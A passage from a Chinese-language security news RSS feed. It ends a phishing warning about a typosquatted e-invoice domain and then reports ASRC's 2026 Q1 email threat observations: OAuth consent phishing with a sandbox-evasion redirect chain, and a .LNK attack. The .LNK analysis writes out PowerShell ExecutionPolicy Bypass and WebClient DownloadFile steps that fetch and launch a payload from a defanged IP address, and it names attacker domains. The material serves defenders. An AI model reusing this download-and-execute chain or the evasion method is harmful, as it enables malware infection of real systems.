gov. </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">作為「子網域（</span><span lang="EN-US">Subdomain</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）」，企圖混淆視聽。</span></li>
<li class="MsoNormal" style="mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">錯字網域攻擊：</span></strong> <span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">財政部電子發票的正確英文拼寫為</span><span lang="EN-US"> einvoice</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">。駭客刻意將網址註冊為</span><span lang="EN-US"> einvioce</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">（將</span><span lang="EN-US"> o </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">和</span><span lang="EN-US"> i </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">順序對調），利用人類大腦在快速閱讀時會自動腦補修正的視覺錯覺，成功騙過受害者的眼睛。</span></li>
</ol>
<p class="MsoNormal"><span lang="EN-US">&nbsp;</span></p>
<p class="MsoNormal"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">資安防護建議與應對措施</span></strong></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">當您被引導至該釣魚網站後，攻擊者會可能要求您輸入身分證字號、平台密碼，甚至以「匯入獎金」為由，誘騙您填寫<strong>信用卡卡號與背面末三碼（</strong></span><strong><span lang="EN-US">CVV</span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，進而造成嚴重的財務損失與個資外洩。</span></p>
<p class="MsoNormal"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">為保障您的資訊與財產安全，請落實以下防護原則：</span></strong></p>
<ul style="margin-top: 0cm;" type="disc">
<li class="MsoNormal" style="mso-list: l1 level1 lfo2; tab-stops: list 36.0pt;"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">零信任原則（</span><span lang="EN-US">Zero Trust</span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）：</span></strong> <span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">「永不信任，始終驗證」（</span><span lang="EN-US">Never Trust, Always Verify</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">），對於任何帶有超連結的主動通知（無論是簡訊或</span><span lang="EN-US"> Email</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）保持高度懷疑。絕對不要直接在點擊不明連結後開啟的網頁中，輸入任何機敏個資或金融資訊。</span></li>
<li class="MsoNormal" style="mso-list: l1 level1 lfo2; tab-stops: list 36.0pt;"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">自主查證：</span></strong> <span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">若需確認發票是否中獎，請略過信件中的連結，自行開啟官方推出的「<strong>統一發票兌獎</strong></span><strong><span lang="EN-US"> APP</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">」，或於瀏覽器手動搜尋並進入「財政部電子發票整合服務平台」查證。</span></li>
<li class="MsoNormal" style="mso-list: l1 level1 lfo2; tab-stops: list 36.0pt;"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">落實通報機制：</span></strong> <span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">若收到此類帶有惡意網址的詐騙訊息，建議可撥打</span> <strong><span lang="EN-US">165 </span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">反詐騙諮詢專線</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，或透過警政相關管道進行檢舉通報，協助將該惡意網域列入阻擋清單，降低整體網路環境的資安風險。</span></li>
</ul>
<p class="MsoNormal"><span lang="EN-US">&nbsp;</span></p>]]></description>
    </item>
    <item>
      <guid isPermaLink="false">067C26E9-E9DD-4456-BDA9-1BC07690CC0A</guid>
      <title>ASRC 2026 第一季電子郵件安全觀察，郵件攻擊經歷明顯的戰術轉變</title>
      <link>https://news.taiwannet.com.tw/news/203596/asrc-2026-%E7%AC%AC%E4%B8%80%E5%AD%A3%E9%9B%BB%E5%AD%90%E9%83%B5%E4%BB%B6%E5%AE%89%E5%85%A8%E8%A7%80%E5%AF%9F-%E9%83%B5%E4%BB%B6%E6%94%BB%E6%93%8A%E7%B6%93%E6%AD%B7%E6%98%8E%E9%A1%AF%E7%9A%84%E6%88%B0%E8%A1%93%E8%BD%89%E8%AE%8A.html</link>
      <pubDate>Fri, 01 May 2026 00:00:00 +0800</pubDate>
      <dc:creator>中華數位科技</dc:creator>
      <category>科技新訊</category>
      <description><![CDATA[<img src="https://news.taiwannet.com.tw/images/user_uploaded/203596_c77dbce02b9544ea9936abadfc188fcc.jpg" border="0" style="max-width: 100%;"><p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">根據</span><span lang="EN-US">ASRC </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">垃圾訊息研究中心的觀察，</span><span lang="EN-US">2026</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">年第一季，電子郵件安全威脅正經歷顯著的戰術轉變。從本季的防護統計數據中可以看出，儘管傳統的垃圾郵件與病毒信件依然佔據極大宗的網路流量，但純粹夾帶病毒執行檔的攻擊比例逐漸下降，取而代之的是帶有惡意連結的釣魚信件、以及高度客製化的社交工程攻擊大幅增加。</span></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">攻擊者正在積極轉向「離地攻擊」（</span><span lang="EN-US">Living off the Land</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）<strong>與</strong>「合法服務寄生」的策略。他們不再直接把惡意酬載塞進附檔，而是利用合法雲端服務（如微軟基礎設施）、各式混淆腳本與捷徑檔（</span><span lang="EN-US">.lnk</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）來作為攻擊鏈的開端。這些改變讓傳統基於靜態特徵碼（</span><span lang="EN-US">Signature-based</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）的防護機制面臨極大挑戰，企業的防禦重點必須從單一檔案掃描，延伸至行為模式、網址跳轉與身分授權的動態監控。</span></p>
<p class="MsoNormal"><span style="font-size: 18pt;"><strong><span lang="EN-US" style="line-height: 115%;">2026 Q1 </span></strong><strong><span style="line-height: 115%; font-family: 新細明體, serif;">關鍵攻擊樣本與手法剖析</span></strong></span></p>
<p class="MsoNormal"><strong><span lang="EN-US">1. </span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">利用合法微軟</span><span lang="EN-US"> OAuth </span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">服務進行「同意授權」釣魚與沙箱規避</span></strong></p>
<p class="MsoNormal"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">攻擊手法：利用微軟官方網址與憑證授權機制</span></strong></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">在本季截獲的樣本中，攻擊者透過發送看似正常的郵件，內含指向微軟官方登入網域的合法連結：</span></p>
<p class="MsoNormal"><span lang="EN-US">https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=...</span></p>
<p class="MsoNormal"><span lang="EN-US" style="mso-no-proof: yes;"><!-- [if gte vml 1]><v:shapetype
 id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
 path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
 <v:stroke joinstyle="miter"/>
 <v:formulas>
  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
  <v:f eqn="sum @0 1 0"/>
  <v:f eqn="sum 0 0 @1"/>
  <v:f eqn="prod @2 1 2"/>
  <v:f eqn="prod @3 21600 pixelWidth"/>
  <v:f eqn="prod @3 21600 pixelHeight"/>
  <v:f eqn="sum @0 0 1"/>
  <v:f eqn="prod @6 1 2"/>
  <v:f eqn="prod @7 21600 pixelWidth"/>
  <v:f eqn="sum @8 21600 0"/>
  <v:f eqn="prod @7 21600 pixelHeight"/>
  <v:f eqn="sum @10 21600 0"/>
 </v:formulas>
 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
 <o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="圖片_x0020_6" o:spid="_x0000_i1028" type="#_x0000_t75"
 style='width:414.75pt;height:230.25pt;visibility:visible;mso-wrap-style:square'>
 <v:imagedata src="file:///C:/Users/IvyChen/AppData/Local/Temp/msohtmlclip1/01/clip_image001.jpg"
  o:title=""/>
</v:shape><![endif]--><!-- [if !vml]--><img style="display: block; margin-left: auto; margin-right: auto;" src="https://news.taiwannet.com.tw/news/image/a696a2856a3343329876930f4eef22f4.jpg" width="553" height="307"><!--[endif]--></span></p>
<p class="MsoNormal" style="text-align: center;"><span style="font-size: 12pt; color: rgb(53, 152, 219);"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">攻擊者透過發送看似正常的郵件，內含指向微軟官方登入網域的合法連結</span></span></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">由於該網域本身具有極高的信譽評等，傳統郵件閘道通常會直接放行。</span></p>
<p><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">技術剖析</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">：</span></p>
<ul>
<li><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">非法同意攻擊（</span><span lang="EN-US">Illicit Consent Grant Attack</span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">：連結內帶有</span><span lang="EN-US"> scope=openid+profile+https://graph.microsoft.com/User.Read </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">參數。攻擊者的目的是誘騙受害者登入後，授權一個惡意的第三方應用程式（</span><span lang="EN-US">App</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）存取其</span><span lang="EN-US"> Microsoft 365 </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">帳戶資料，可能為了獲取身分資訊進行下一步的精準社交工程。</span></li>
<li><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">動態跳轉鏈（</span><span lang="EN-US">Open Redirect</span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">：授權或跳轉過程中，流量會導向被駭客控制的網域（由開始</span><span lang="EN-US">fanaraco.com</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">、</span><span lang="EN-US">hcart.org</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，最後落地於</span><span lang="EN-US"> ahmedcorecutting.com</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）。</span></li>
<li><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">沙箱規避機制（</span><span lang="EN-US">Evasion</span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">：這是一個極具針對性的設計。攻擊者將受害者的</span><span lang="EN-US"> Email </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">進行</span><span lang="EN-US"> Base64 </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">編碼，並透過</span><span lang="EN-US"> state </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">參數（如</span><span lang="EN-US"> state=Y2hlsmcuJ2FsdmluQGludmKudVjLmNvbQ===</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）進行傳遞。當發生第二次跳轉時，惡意伺服器會檢查此參數是否存在；如果不存在（這通常代表是資安廠商的自動化沙箱正在爬梳網頁），伺服器就會將流量導向無害的微軟</span><span lang="EN-US"> Office </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">維基百科頁面，藉此騙過安全檢測設備。</span></li>
</ul>
<p class="MsoNormal" style="margin-left: 72.0pt;"><span lang="EN-US">&nbsp;</span></p>
<p class="MsoNormal"><strong><span lang="EN-US">2. </span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">壓縮檔夾帶惡意捷徑（</span><span lang="EN-US">.LNK</span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">）的無文件攻擊</span></strong></p>
<p class="MsoNormal"><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">攻擊手法：以捷徑檔取代</span><span lang="EN-US"> Office </span></strong><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">巨集，執行本機指令</span></strong></p>
<p class="MsoNormal"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">隨著微軟預設全面封鎖來自網路的</span><span lang="EN-US"> Office </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">巨集，攻擊者紛紛改用</span><span lang="EN-US"> .lnk</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">（捷徑檔）作為惡意酬載的載體。本季樣本顯示，攻擊者會寄送名為</span><span lang="EN-US"> Document.zip </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">的壓縮檔，內部夾帶偽裝成文件的</span><span lang="EN-US"> Document.doc.lnk</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，利用使用者雙擊解壓縮檔案的習慣觸發攻擊。</span></p>
<p class="MsoNormal"><span lang="EN-US" style="mso-no-proof: yes;"><!-- [if gte vml 1]><v:shape
 id="圖片_x0020_2" o:spid="_x0000_i1027" type="#_x0000_t75" style='width:414.75pt;
 height:127.5pt;visibility:visible;mso-wrap-style:square'>
 <v:imagedata src="file:///C:/Users/IvyChen/AppData/Local/Temp/msohtmlclip1/01/clip_image003.jpg"
  o:title=""/>
</v:shape><![endif]--><!-- [if !vml]--><img style="display: block; margin-left: auto; margin-right: auto;" src="https://news.taiwannet.com.tw/news/image/086a07d8b22c4a068a1a748717a93a36.jpg" width="553" height="170"><!--[endif]--></span></p>
<p class="MsoNormal" style="text-align: center;"><span style="font-size: 12pt; color: rgb(53, 152, 219);"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">攻擊者會寄送名為</span><span lang="EN-US"> Document.zip </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">的壓縮檔，內部夾帶偽裝成文件的</span><span lang="EN-US"> Document.doc.lnk</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，利用使用者雙擊解壓縮檔案的習慣觸發攻擊</span></span></p>
<p><strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">技術剖析</span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">：</span></p>
<ul>
<li><strong style="text-indent: -18pt; font-size: 16px;"><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">繞過執行原則：<br></span></strong><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">此捷徑檔直接呼叫</span><span lang="EN-US"> %windir%</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">裡位於</span><span lang="EN-US">System32</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">下的</span><span lang="EN-US">cmd.exe</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，以參數</span><span lang="EN-US">/c</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">執行</span><span lang="EN-US">powershell.exe</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">。並以</span><span lang="EN-US">ExecutionPolicy Bypass</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">，強制繞過</span><span lang="EN-US"> Windows </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">預設阻擋未簽署腳本的安全原則。隨後利用</span><span lang="EN-US"> (New-Object System.Net.WebClient).DownloadFile</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">由這個位置</span><span lang="EN-US">hxxp://178.16.54.109/spl.exe','%userprofile%\windrv.exe</span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">下載檔案後，將其另存為系統目錄下的</span><span lang="EN-US"> windrv.exe </span><span style="font-family: '新細明體',serif; mso-ascii-font-family: Aptos; mso-ascii-theme-font: minor-latin; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Aptos; mso-hansi-theme-font: minor-latin;">並逕行啟動，完成系統感染。</span></li>
